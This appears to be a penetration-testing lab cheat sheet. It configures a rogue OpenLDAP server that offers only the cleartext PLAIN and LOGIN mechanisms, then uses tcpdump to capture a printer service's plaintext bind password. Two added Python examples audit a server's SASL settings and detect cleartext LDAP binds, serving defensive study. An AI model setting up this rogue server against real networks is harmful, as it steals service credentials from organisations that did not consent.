
Rogue LDAP Server

sudo apt install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
  • Omit initial configuration?: No
  • DNS domain name: target domain
  • Organization name: target domain
  • Administrator password: anything, but remember it
  • Database removed?: No
  • Move old database?: Yes

Backing up /etc/ldap/slapd.d in /var/backups/slapd-2.5.18+dfsg-3... done.
Moving old database directory to /var/backups
Creating initial configuration... done.
Creating LDAP directory... done.

Before using the rogue LDAP server, we need to make it vulnerable by downgrading the supported authentication mechanisms: the server should only offer the PLAIN and LOGIN mechanisms, both of which carry the credentials in the clear. To do this, create a new LDIF file called olcSaslSecProps.ldif with the following content:

cat ./olcSaslSecProps.ldif
# olcSaslSecProps.ldif
dn: cn=config
changetype: modify
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
  • olcSaslSecProps: Specifies the SASL security properties
  • noanonymous: Disables mechanisms that support anonymous login
  • minssf: Specifies the minimum acceptable security strength factor; 0 means no protection is required

Update configuration

sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart

Verify configuration

ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms

We now have our LDAP server running on port 389.
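The same ldapsearch query is the check a defender runs against their own directory servers. The following is an added example, not code from the original cheat sheet: it parses the LDIF that the query above prints, together with an olcSaslSecProps value, and reports mechanisms that would carry a password in the clear. SAMPLE_LDIF is a constructed sample, not captured output.

```python
"""Audit the SASL mechanisms an LDAP server advertises.

Added example, not part of the original cheat sheet: it parses the LDIF that
`ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms` prints,
plus an olcSaslSecProps value, and reports anything that lets a client send
the password in the clear. SAMPLE_LDIF is constructed, not captured output.
"""
from __future__ import annotations

# SASL mechanisms that transmit the credential itself; cleartext unless the
# session is wrapped in TLS (ldaps:// or STARTTLS).
CLEARTEXT_MECHANISMS = {"PLAIN", "LOGIN"}

# Constructed sample of what a server with minssf=0 might print.
SAMPLE_LDIF = """\
dn:
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN
"""


def parse_ldif_attrs(ldif: str) -> dict[str, list[str]]:
    """Parse one LDIF record into attribute -> values, unfolding continuation lines."""
    lines: list[str] = []
    for raw in ldif.splitlines():
        if raw.startswith(" ") and lines:  # LDIF folds long values onto lines starting with a space
            lines[-1] += raw[1:]
        elif raw.strip() and not raw.startswith("#"):
            lines.append(raw)
    attrs: dict[str, list[str]] = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            attrs.setdefault(name.strip(), []).append(value.strip())
    return attrs


def parse_sasl_secprops(value: str) -> dict[str, int | bool]:
    """Turn 'noanonymous,minssf=0,passcred' into {'noanonymous': True, 'minssf': 0, 'passcred': True}."""
    props: dict[str, int | bool] = {}
    for item in value.split(","):
        key, sep, val = item.strip().partition("=")
        if key:
            props[key] = int(val) if sep and val.isdigit() else True
    return props


def audit(ldif: str, secprops: str | None = None) -> list[str]:
    """Return findings; an empty list means no cleartext path was advertised."""
    findings: list[str] = []
    mechs = {m.upper() for m in parse_ldif_attrs(ldif).get("supportedSASLMechanisms", [])}
    for mech in sorted(mechs & CLEARTEXT_MECHANISMS):
        findings.append(f"cleartext SASL mechanism advertised: {mech}")
    if secprops is not None and parse_sasl_secprops(secprops).get("minssf") == 0:
        findings.append("minssf=0: server accepts sessions with no protection layer")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_LDIF, "noanonymous,minssf=0,passcred"):
        print(finding)
```

Run it against the output of the ldapsearch query above; a directory that only advertises GSSAPI or other credential-protecting mechanisms, with a non-zero minssf, produces no findings. The secprops half is only meaningful for servers you administer, since olcSaslSecProps is read from cn=config rather than advertised to clients.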

Capturing LDAP Credentials

sudo tcpdump -SX -i breachad tcp port 389
   -S, --absolute-tcp-sequence-numbers
          Print absolute, rather than relative, TCP sequence numbers.

   -X     When parsing and printing, in addition to printing the headers of each packet, print the data of each packet (minus its link level header) in hex and ASCII.
          This is very handy for analysing new protocols. In the current implementation this flag may have the same effect as -XX if the packet is truncated.

And we are able to retrieve the plaintext password that the printer service uses to bind to LDAP.
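What tcpdump shows here is an LDAP simple bind: the password travels in the BindRequest as a plain OCTET STRING. A network sensor can spot exactly that. The following is an added example, not code from the original cheat sheet: a minimal BER decoder for the LDAP BindRequest (RFC 4511) that distinguishes a simple bind from a SASL bind and raises an alert when the credential would cross the wire unprotected. The two packets are constructed by hand, not captured; the DN and password in them are made up, and the alert reports only the DN and the password length.

```python
"""Detect cleartext LDAP binds in captured port-389 traffic.

Added example, not part of the original cheat sheet: a minimal BER decoder for
the LDAP BindRequest (RFC 4511) that tells a simple bind (password in the
packet) from a SASL bind, so a sensor can alert on the first one. The two
packets below are constructed by hand, not captured; the DN and password in
them are made up.
"""
from __future__ import annotations

# LDAPMessage{ messageID 1, BindRequest{ version 3, name "cn=printer,dc=lab", simple "secret123" } }
SIMPLE_BIND = bytes.fromhex(
    "3026 020101 6021 020103 0411 636e3d7072696e7465722c64633d6c6162 8009 736563726574313233"
)
# LDAPMessage{ messageID 2, BindRequest{ version 3, name "", sasl{ mechanism "GSSAPI" } } }
SASL_BIND = bytes.fromhex("3014 020102 600f 020103 0400 a308 0406 475353415049")

TAG_SEQUENCE, TAG_INTEGER = 0x30, 0x02
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_AUTH_SIMPLE = 0x80    # [0] OCTET STRING: the password itself
TAG_AUTH_SASL = 0xA3      # [3] SaslCredentials SEQUENCE


def read_tlv(buf: bytes, pos: int) -> tuple[int, bytes, int]:
    """Read one BER tag-length-value at pos; return (tag, value, position after it)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: low bits give the number of length bytes
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated element")
    return tag, buf[pos:end], end


def parse_bind_request(packet: bytes) -> dict | None:
    """Decode an LDAPMessage; return bind details, or None if it is not a BindRequest."""
    tag, message, _ = read_tlv(packet, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an LDAPMessage")
    tag, mid, pos = read_tlv(message, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(message, pos)
    if tag != TAG_BIND_REQUEST:
        return None
    _, ver, pos = read_tlv(op, 0)           # version INTEGER
    _, name, pos = read_tlv(op, pos)        # name LDAPDN
    tag, auth, _ = read_tlv(op, pos)        # authentication CHOICE
    info = {
        "message_id": int.from_bytes(mid, "big"),
        "version": int.from_bytes(ver, "big"),
        "dn": name.decode("utf-8", "replace"),
    }
    if tag == TAG_AUTH_SIMPLE:
        # The password is in `auth`; report only its length, never the value.
        info.update(auth="simple", credential_len=len(auth))
    elif tag == TAG_AUTH_SASL:
        _, mech, _ = read_tlv(auth, 0)      # first element of SaslCredentials is the mechanism name
        info.update(auth="sasl", mechanism=mech.decode("ascii", "replace"))
    else:
        info.update(auth="unknown")
    return info


def cleartext_bind_alert(packet: bytes, tls: bool = False) -> str | None:
    """Return an alert when the bind puts the password on the wire unprotected, else None."""
    info = parse_bind_request(packet)
    if info is None or tls:
        return None
    if info["auth"] == "simple" and info["credential_len"] > 0:   # empty password = anonymous bind
        return f"cleartext simple bind as '{info['dn']}' (msg {info['message_id']})"
    if info["auth"] == "sasl" and info["mechanism"].upper() in {"PLAIN", "LOGIN"}:
        return f"cleartext SASL {info['mechanism']} bind as '{info['dn']}'"
    return None


if __name__ == "__main__":
    for pkt in (SIMPLE_BIND, SASL_BIND):
        print(parse_bind_request(pkt), "->", cleartext_bind_alert(pkt))
```

The decoder expects the TCP payload only, i.e. the bytes after the link, IP and TCP headers that tcpdump -X prints alongside them; the `tls` flag is for the caller to set from the connection state (ldaps:// or a completed STARTTLS), because inside TLS the same bind is not visible and not a finding. An anonymous simple bind carries an empty password and is deliberately not alerted on.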


NetIQ Documentation: NetIQ eDirectory 8.8 SP8 Troubleshooting Guide - LDIF Description